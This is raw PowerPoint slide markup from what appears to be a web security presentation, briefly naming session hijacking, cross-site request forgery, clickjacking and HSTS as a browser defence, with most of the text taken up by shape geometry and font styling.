              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5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dirty="0" sz="160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dirty="0" sz="1600" spc="-9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30">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rece</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15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dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>v</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-1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dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>s  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>the</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-8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Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>f</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-50">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>rge</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>re</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>q</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-5">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>u</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="160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dirty="0" sz="1600" spc="-6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dirty="0" sz="1600" spc="-35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dirty="0" sz="1600" spc="-9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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>fr</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>o</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>m  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-85">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Al</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-45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dirty="0" sz="1600" spc="-35">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>c</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-3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dirty="0" sz="1600" spc="-10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20">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>an</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-15">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>d</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-9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40">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>attack  </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-25">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>become</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="1600" spc="-10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45">
                <a:solidFill>
                  <a:srgbClr val="404040"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>successful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1738864" y="3522726"/>
            <a:ext cx="1416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20" b="1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95776" y="306451"/>
            <a:ext cx="866203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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Session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50">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Hijacking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5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dirty="0" spc="-5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35">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Cross-Site</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" spc="-4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40">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Request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25">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Forgery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2976" y="760476"/>
            <a:ext cx="12743688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653664" y="6675119"/>
            <a:ext cx="11022330" cy="1708150"/>
            <a:chOff x="2653664" y="6675119"/>
            <a:chExt cx="11022330" cy="1708150"/>
          </a:xfrm>
        </p:grpSpPr>
        <p:sp>
          <p:nvSpPr>
            <p:cNvPr id="5" name="object 5"/>
            <p:cNvSpPr/>
            <p:nvPr/>
          </p:nvSpPr>
          <p:spPr>
            <a:xfrm>
              <a:off x="2663189" y="6902957"/>
              <a:ext cx="11003280" cy="1470660"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="11003280" h="1470659">
                  <a:moveTo>
                    <a:pt x="0" y="245110"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="4979" y="195708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19260" y="149697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41857" y="108061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71786" y="71786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108061" y="41857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149697" y="19260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195708" y="4979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245110" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10758169" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10807571" y="4979"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10853582" y="19260"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10895218" y="41857"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10931493" y="71786"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10961422" y="108061"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10984019" y="149697"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10998300" y="195708"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11003279" y="245110"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="11003279" y="1225537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10998300" y="1274939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10984019" y="1320952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10961422" y="1362589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10931493" y="1398866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10895218" y="1428798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10853582" y="1451397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10807571" y="1465680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="10758169" y="1470660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="245110" y="1470660"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="195708" y="1465680"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="149697" y="1451397"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="108061" y="1428798"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="71786" y="1398866"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="41857" y="1362589"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="19260" y="1320952"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="4979" y="1274939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="1225537"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="245110"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:ln w="19049">
              <a:solidFill>
                <a:srgbClr val="57AEF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049523" y="6675119"/>
              <a:ext cx="1531620" cy="449580"/>
            </a:xfrm>
            <a:custGeom>
              <a:avLst/>
              <a:gdLst/>
              <a:ahLst/>
              <a:cxnLst/>
              <a:rect l="l" t="t" r="r" b="b"/>
              <a:pathLst>
                <a:path w="1531620" h="449579">
                  <a:moveTo>
                    <a:pt x="1456689" y="0"/>
                  </a:moveTo>
                  <a:lnTo>
                    <a:pt x="74930" y="0"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45755" y="5885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21939" y="21939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5885" y="45755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="74929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="0" y="374649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="5885" y="403824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="21939" y="427640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="45755" y="443694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="74930" y="449579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456689" y="449579"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485864" y="443694"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1509680" y="427640"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1525734" y="403824"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531620" y="374649"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1531620" y="74929"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1525734" y="45755"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1509680" y="21939"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1485864" y="5885"/>
                  </a:lnTo>
                  <a:lnTo>
                    <a:pt x="1456689" y="0"/>
                  </a:lnTo>
                  <a:close/>
                </a:path>
              </a:pathLst>
            </a:custGeom>
            <a:solidFill>
              <a:srgbClr val="44AAF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3128264" y="6705345"/>
            <a:ext cx="10400665" cy="1313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7665">
              <a:lnSpc>
                <a:spcPct val="100000"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="40" b="1" i="1">
                <a:solidFill>
                  <a:srgbClr val="FFFFFF"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Note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13999"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="2270"/>
              </a:spcBef>
            </a:pPr>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-30">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Sites</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>use</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Strict</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Transport</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>Security</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>(HSTS)</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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65">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>list</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>maintained</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>by</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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0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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>browser</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>to </a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-61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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>prevent</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-13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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>clients</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-15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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>from</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>requesting</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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5">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>HTTP</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="20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5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dirty="0" sz="20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0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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>first</a:t>
            </a:r>
            <a:r>
              <a:rPr dirty="0" sz="2000" spc="-14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0">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Lucida Sans Unicode"/>
                <a:cs typeface="Lucida Sans Unicode"/>
              </a:rPr>
              <a:t>place.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62427" y="2246376"/>
            <a:ext cx="5000625" cy="3933825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5000625" h="3933825">
                <a:moveTo>
                  <a:pt x="4595368" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="404876" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357651" y="2723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312029" y="10690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268312" y="23599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226804" y="41145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187808" y="63024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151629" y="88934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118570" y="118570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88934" y="151629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63024" y="187808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41145" y="226804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23599" y="268312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10690" y="312029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723" y="357651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="404875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3528568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723" y="3575792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10690" y="3621414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23599" y="3665131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41145" y="3706639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63024" y="3745635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88934" y="3781814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118570" y="3814873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151629" y="3844509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187808" y="3870419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226804" y="3892298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268312" y="3909844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312029" y="3922753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357651" y="3930720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404876" y="3933444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4595368" y="3933444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4642592" y="3930720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4688214" y="3922753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4731931" y="3909844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4773439" y="3892298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4812435" y="3870419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4848614" y="3844509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881673" y="3814873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4911309" y="3781814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4937219" y="3745635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4959098" y="3706639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4976644" y="3665131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4989553" y="3621414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4997520" y="3575792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5000244" y="3528568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="5000244" y="404875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4997520" y="357651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4989553" y="312029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4976644" y="268312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4959098" y="226804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4937219" y="187808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4911309" y="151629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4881673" y="118570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4848614" y="88934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4812435" y="63024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4773439" y="41145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4731931" y="23599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4688214" y="10690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4642592" y="2723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4595368" y="0"/>
                </a:lnTo>
                <a:close/>
              </a:path>
            </a:pathLst>
          </a:custGeom>
          <a:solidFill>
            <a:srgbClr val="F8DE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319396" y="3444062"/>
            <a:ext cx="168592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5" b="1">
                <a:solidFill>
                  <a:srgbClr val="3E3E3E"/>
                </a:solidFill>
                <a:latin typeface="Arial"/>
                <a:cs typeface="Arial"/>
              </a:rPr>
              <a:t>Clickjacking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53639" y="4161815"/>
            <a:ext cx="4413885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2550" marR="5080" indent="-70485">
              <a:lnSpc>
                <a:spcPct val="114100"/>
              </a:lnSpc>
              <a:spcBef>
                <a:spcPts val="100"/>
              </a:spcBef>
            </a:pP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Clickjacking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adds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invisible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layer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to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intercept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redirect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click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events.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665464" y="2246376"/>
            <a:ext cx="5000625" cy="3933825"/>
          </a:xfrm>
          <a:custGeom>
            <a:avLst/>
            <a:gdLst/>
            <a:ahLst/>
            <a:cxnLst/>
            <a:rect l="l" t="t" r="r" b="b"/>
            <a:pathLst>
              <a:path w="5000625" h="3933825">
                <a:moveTo>
                  <a:pt x="4595368" y="0"/>
                </a:moveTo>
                <a:lnTo>
                  <a:pt x="404875" y="0"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357651" y="2723"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312029" y="10690"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268312" y="23599"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226804" y="41145"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187808" y="63024"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151629" y="88934"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118570" y="118570"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88934" y="151629"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63024" y="187808"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41145" y="226804"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23599" y="268312"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10690" y="312029"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723" y="357651"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="404875"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="0" y="3528568"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="2723" y="3575792"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="10690" y="3621414"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="23599" y="3665131"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="41145" y="3706639"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="63024" y="3745635"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="88934" y="3781814"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="118570" y="3814873"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="151629" y="3844509"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="187808" y="3870419"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="226804" y="3892298"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="268312" y="3909844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="312029" y="3922753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="357651" y="3930720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="404875" y="3933444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4595368" y="3933444"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4642592" y="3930720"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4688214" y="3922753"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4731931" y="3909844"/>
                </a:lnTo>
                <a:lnTo>
                  <a:pt x="4773439" y="3892298"/>
